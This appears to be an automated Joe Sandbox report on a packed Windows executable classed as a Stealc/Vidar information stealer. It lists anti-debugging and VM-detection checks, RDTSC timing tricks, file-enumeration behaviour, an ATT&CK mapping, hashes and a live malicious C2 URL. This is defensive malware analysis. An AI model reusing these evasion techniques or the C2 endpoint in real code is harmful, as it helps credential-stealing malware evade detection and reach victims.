Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6AC0F0 second address: 6AC0F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6AC0F6 second address: 6AC0FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6AC0FA second address: 6AC15E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push ebp 0x0000000c call 00007FBE44D3A538h 0x00000011 pop ebp 0x00000012 mov dword ptr [esp+04h], ebp 0x00000016 add dword ptr [esp+04h], 00000019h 0x0000001e inc ebp 0x0000001f push ebp 0x00000020 ret 0x00000021 pop ebp 0x00000022 ret 0x00000023 mov dh, F2h 0x00000025 push 00000004h 0x00000027 push 00000000h 0x00000029 push ebx 0x0000002a call 00007FBE44D3A538h 0x0000002f pop ebx 0x00000030 mov dword ptr [esp+04h], ebx 0x00000034 add dword ptr [esp+04h], 0000001Ah 0x0000003c inc ebx 0x0000003d push ebx 0x0000003e ret 0x0000003f pop ebx 0x00000040 ret 0x00000041 mov edx, dword ptr [ebp+122D2C58h] 0x00000047 push 33BE5A00h 0x0000004c pushad 0x0000004d push eax 0x0000004e push edx 0x0000004f je 00007FBE44D3A536h 0x00000055 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6AC3E5 second address: 6AC3EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6AD95A second address: 6AD960 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6AD960 second address: 6AD966 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6AFAC4 second address: 6AFAC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6AFAC8 second address: 6AFAE5 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007FBE444F40B2h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6AFAE5 second address: 6AFAF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBE44D3A53Ch 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5280303 second address: 5280345 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FBE444F40B6h 0x00000008 jmp 00007FBE444F40B5h 0x0000000d popfd 0x0000000e pop edx 0x0000000f pop eax 0x00000010 popad 0x00000011 pop ebp 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FBE444F40ADh 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5280345 second address: 528034B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 528034B second address: 528034F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 528034F second address: 5280353 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 528037B second address: 52803C5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBE444F40ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FBE444F40B6h 0x0000000f push eax 0x00000010 jmp 00007FBE444F40ABh 0x00000015 xchg eax, ebp 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FBE444F40B5h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 52803C5 second address: 52803CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 52803CB second address: 52803DC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov bx, si 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 52803DC second address: 52803E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 52803E2 second address: 52803E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5D5D8F second address: 5D5DA4 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FBE44D3A536h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f jbe 00007FBE44D3A536h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5D5DA4 second address: 5D5DA8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 421E62 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 421E75 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 5CB5F4 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 5EEEEB instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 5D1BE9 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 64E470 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_001D38B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose | 0_2_001D38B0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_001D4910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 0_2_001D4910
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_001CDA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose | 0_2_001CDA80
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_001CE430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA | 0_2_001CE430
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_001CED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose | 0_2_001CED20
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_001D4570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen | 0_2_001D4570
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_001CDE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 0_2_001CDE10
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_001CBE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose | 0_2_001CBE70
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_001CF6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 0_2_001CF6B0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_001D3EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose | 0_2_001D3EA0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_001C16D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 0_2_001C16D0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_001C1160 GetSystemInfo,ExitProcess | 0_2_001C1160
Source: file.exe, file.exe, 00000000.00000002.1770738342.00000000005A8000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: file.exe, 00000000.00000002.1771323751.00000000014D5000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWX
Source: file.exe, 00000000.00000002.1771323751.000000000148E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMwareVMware
Source: file.exe, 00000000.00000002.1771323751.0000000001503000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: file.exe, 00000000.00000002.1770738342.00000000005A8000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-13493
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-13516
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-13496
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-13508
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-13548
Source: C:\Users\user\Desktop\file.exe | System information queried: ModuleInformation
Source: C:\Users\user\Desktop\file.exe | Process information queried: ProcessInformation

                Anti Debugging

Source: C:\Users\user\Desktop\file.exe | Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | File opened: NTICE
Source: C:\Users\user\Desktop\file.exe | File opened: SICE
Source: C:\Users\user\Desktop\file.exe | File opened: SIWVID
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_001C45C0 VirtualProtect ?,00000004,00000100,00000000 | 0_2_001C45C0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_001D9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress | 0_2_001D9860
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_001D9750 mov eax, dword ptr fs:[00000030h] | 0_2_001D9750
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_001D7850 GetProcessHeap,RtlAllocateHeap,GetUserNameA | 0_2_001D7850
Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\file.exe | Memory protected: page guard

                HIPS / PFW / Operating System Protection Evasion

Source: Yara match | File source: Process Memory Space: file.exe PID: 7480, type: MEMORYSTR
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_001D9600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle | 0_2_001D9600
Source: file.exe, file.exe, 00000000.00000002.1770738342.00000000005A8000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: 2d$Program Manager
Source: C:\Users\user\Desktop\file.exe | Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree | 0_2_001D7B90
Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_001D6920 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess | 0_2_001D6920
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_001D7850 GetProcessHeap,RtlAllocateHeap,GetUserNameA | 0_2_001D7850
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_001D7A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA | 0_2_001D7A30

                Stealing of Sensitive Information

Source: Yara match | File source: 0.2.file.exe.1c0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.1771323751.000000000148E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1770548297.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.1730271213.00000000050F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 7480, type: MEMORYSTR
Source: Yara match | File source: dump.pcap, type: PCAP

                Remote Access Functionality

                Source: Yara match | File source: 0.2.file.exe.1c0000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000000.00000002.1771323751.000000000148E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000002.1770548297.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000003.1730271213.00000000050F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: file.exe PID: 7480, type: MEMORYSTR
                Source: Yara match | File source: dump.pcap, type: PCAP
                ATT&CK Matrix (one line per tactic; a leading number is the count shown in the report's matrix cell)

                Reconnaissance: Gather Victim Identity Information, Credentials, Email Addresses, Employee Names, Gather Victim Network Information, Domain Properties, DNS, Network Trust Dependencies
                Resource Development: Acquire Infrastructure, Domains, DNS Server, Virtual Private Server, Server, Botnet, Web Services, Serverless
                Initial Access: Valid Accounts, Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts, Replication Through Removable Media, External Remote Services, Drive-by Compromise
                Execution: 2 Command and Scripting Interpreter, 11 Native API, At, Cron, Launchd, Scheduled Task, Systemd Timers, Container Orchestration Job
                Persistence: 1 DLL Side-Loading, Boot or Logon Initialization Scripts, Logon Script (Windows), Login Hook, Network Logon Script, RC Scripts, Startup Items, Scheduled Task/Job
                Privilege Escalation: 11 Process Injection, 1 DLL Side-Loading, Logon Script (Windows), Login Hook, Network Logon Script, RC Scripts, Startup Items, Scheduled Task/Job
                Defense Evasion: 1 Masquerading, 33 Virtualization/Sandbox Evasion, 11 Disable or Modify Tools, 11 Process Injection, 1 Deobfuscate/Decode Files or Information, 3 Obfuscated Files or Information, 12 Software Packing, 1 DLL Side-Loading
                Credential Access: OS Credential Dumping, LSASS Memory, Security Account Manager, NTDS, LSA Secrets, Cached Domain Credentials, DCSync, Proc Filesystem
                Discovery: 2 System Time Discovery, 641 Security Software Discovery, 33 Virtualization/Sandbox Evasion, 13 Process Discovery, 1 Account Discovery, 1 System Owner/User Discovery, 1 File and Directory Discovery, 324 System Information Discovery
                Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH, VNC, Windows Remote Management, Cloud Services
                Collection: 1 Archive Collected Data, Data from Removable Media, Data from Network Shared Drive, Input Capture, Keylogging, GUI Input Capture, Web Portal Capture, Credential API Hooking
                Command and Control: 2 Encrypted Channel, 2 Ingress Tool Transfer, 2 Non-Application Layer Protocol, 12 Application Layer Protocol, Fallback Channels, Multiband Communication, Commonly Used Port, Application Layer Protocol
                Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Traffic Duplication, Scheduled Transfer, Data Transfer Size Limits, Exfiltration Over C2 Channel, Exfiltration Over Alternative Protocol
                Impact: Abuse Accessibility Features, Network Denial of Service, Data Encrypted for Impact, Data Destruction, Data Encrypted for Impact, Service Stop, Inhibit System Recovery, Defacement
                Source | Detection | Scanner | Label | Link
                file.exe | 100% | Avira | TR/Crypt.TPM.Gen
                file.exe | 100% | Joe Sandbox ML
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                Source | Detection | Scanner | Label | Link
                http://185.215.113.37/ | 100% | URL Reputation | malware
                http://185.215.113.37 | 100% | URL Reputation | malware
                http://185.215.113.37/e2b1563c6670f193.php | 100% | URL Reputation | malware
                No contacted domains info
                Name | Malicious | Antivirus Detection | Reputation
                http://185.215.113.37/ | true | URL Reputation: malware | unknown
                http://185.215.113.37/e2b1563c6670f193.php | true | URL Reputation: malware | unknown
                Name | Source | Malicious | Antivirus Detection | Reputation
                http://185.215.113.37/e2b1563c6670f193.php?M9 | file.exe, 00000000.00000002.1771323751.00000000014E7000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
                http://185.215.113.37/e2b1563c6670f193.phpRL | file.exe, 00000000.00000002.1771323751.00000000014E7000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
                http://185.215.113.37/e2b1563c6670f193.php- | file.exe, 00000000.00000002.1771323751.00000000014D5000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
                http://185.215.113.37/rosoft | file.exe, 00000000.00000002.1771323751.00000000014E7000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
                http://185.215.113.37 | file.exe, 00000000.00000002.1771323751.000000000148E000.00000004.00000020.00020000.00000000.sdmp | true | URL Reputation: malware | unknown
                http://185.215.113.37e | file.exe, 00000000.00000002.1771323751.000000000148E000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
                http://185.215.113.37/e2b1563c6670f193.phpy | file.exe, 00000000.00000002.1771323751.00000000014D5000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
                            IP | Domain | Country | ASN | ASN Name | Malicious
                            185.215.113.37 | unknown | Portugal | 206894 | WHOLESALECONNECTIONSNL | true
                            Joe Sandbox version:41.0.0 Charoite
                            Analysis ID:1532619
                            Start date and time:2024-10-13 18:58:08 +02:00
                            Joe Sandbox product:CloudBasic
                            Overall analysis duration:0h 3m 16s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                            Number of new started processes analysed:1
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Sample name:file.exe
                            Detection:MAL
                            Classification:mal100.troj.evad.winEXE@1/0@0/1
                            EGA Information:
                            • Successful, ratio: 100%
                            HCA Information:
                            • Successful, ratio: 80%
                            • Number of executed functions: 19
                            • Number of non-executed functions: 80
                            Cookbook Comments:
                            • Found application associated with file extension: .exe
                            • Stop behavior analysis, all processes terminated
                            • Report size getting too big, too many NtQueryValueKey calls found.
                            No simulations
                            Match: 185.215.113.37
                            Associated Sample Name / URL | Detection | Threat Name | Context
                            file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
                            file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
                            file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
                            file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
                            file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
                            file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
                            file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
                            file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
                            file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
                            file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
                            No context
                            Match: WHOLESALECONNECTIONSNL
                            Associated Sample Name / URL | Detection | Threat Name | Context
                            file.exe | malicious | Stealc, Vidar | 185.215.113.37
                            file.exe | malicious | Stealc | 185.215.113.37
                            file.exe | malicious | Stealc | 185.215.113.37
                            file.exe | malicious | Stealc, Vidar | 185.215.113.37
                            file.exe | malicious | Stealc | 185.215.113.37
                            file.exe | malicious | Stealc | 185.215.113.37
                            file.exe | malicious | Stealc, Vidar | 185.215.113.37
                            file.exe | malicious | Stealc | 185.215.113.37
                            file.exe | malicious | Stealc, Vidar | 185.215.113.37
                            file.exe | malicious | Stealc | 185.215.113.37
                            No context
                            No context
                            No created / dropped files found
                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                            Entropy (8bit):7.9493399173853225
                            TrID:
                            • Win32 Executable (generic) a (10002005/4) 99.96%
                            • Generic Win/DOS Executable (2004/3) 0.02%
                            • DOS Executable Generic (2002/1) 0.02%
                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                            File name:file.exe
                            File size:1'819'136 bytes
                            MD5:7299a751b9b88863206dd5259f551f8e
                            SHA1:bebfc704d946a2b845a05beb83a6960ad7aefba2
                            SHA256:613b4f35bfac7662559bd5c36e06493e60463f11d443ddd8d334bd361ea8d969
                            SHA512:801bb991e4348b24b1a5fdfa9e28eb5d5996938189646f51d0f04ad3b504232612b6f38fec7509424178331659d2b8a491f84ea9410063ca7974295fff3303c3
                            SSDEEP:49152:YCMyaABt4U8Cul9vfCaxGLM558pMgccSAeUDO6Sph0F:YCMyTny3vduy5KP5kh0
                            TLSH:B88533CC4BD68EBAC5E86F73E7B235C31AA405D952A807B578A44777920F4BF2703246
                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L...J..f...........
                            Icon Hash:90cececece8e8eb0
                            Entrypoint:0xa90000
                            Entrypoint Section:.taggant
                            Digitally signed:false
                            Imagebase:0x400000
                            Subsystem:windows gui
                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                            DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                            Time Stamp:0x66F99A4A [Sun Sep 29 18:19:54 2024 UTC]
                            TLS Callbacks:
                            CLR (.Net) Version:
                            OS Version Major:5
                            OS Version Minor:1
                            File Version Major:5
                            File Version Minor:1
                            Subsystem Version Major:5
                            Subsystem Version Minor:1
                            Import Hash:2eabe9054cad5152567f0699947a2c5b
                            Instruction
                            Programming Language:
                            • [C++] VS2010 build 30319
                            • [ASM] VS2010 build 30319
                            • [ C ] VS2010 build 30319
                            • [ C ] VS2008 SP1 build 30729
                            • [IMP] VS2008 SP1 build 30729
                            • [LNK] VS2010 build 30319
                            Name | Virtual Address | Virtual Size | Is in Section
                            IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                            IMAGE_DIRECTORY_ENTRY_IMPORT | 0x25d050 | 0x64 | .idata
                            IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
                            IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                            IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                            IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x25d1f8 | 0x8 | .idata
                            IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                            IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                            IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                            IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                            Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                            (unnamed) | 0x1000 | 0x25b000 | 0x22800 | dc69cf9b67b1f1b18764e900724b2133 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .rsrc | 0x25c000 | 0x1000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .idata | 0x25d000 | 0x1000 | 0x200 | c60c4959cc8d384ac402730cc6842bb0 | False | 0.1328125 | data | 0.9064079259880791 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            (unnamed) | 0x25e000 | 0x29b000 | 0x200 | eec589aa36359981257396e511cc0d37 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            ncanagua | 0x4f9000 | 0x196000 | 0x196000 | 5f30712ff3fab382ea6b7df5a6b5c317 | False | 0.9948477909482759 | data | 7.954392600986758 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            tdiayxtm | 0x68f000 | 0x1000 | 0x400 | 7fb76f52c9c9be78e2e6ec10c68adbd8 | False | 0.8447265625 | data | 6.353377991578972 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
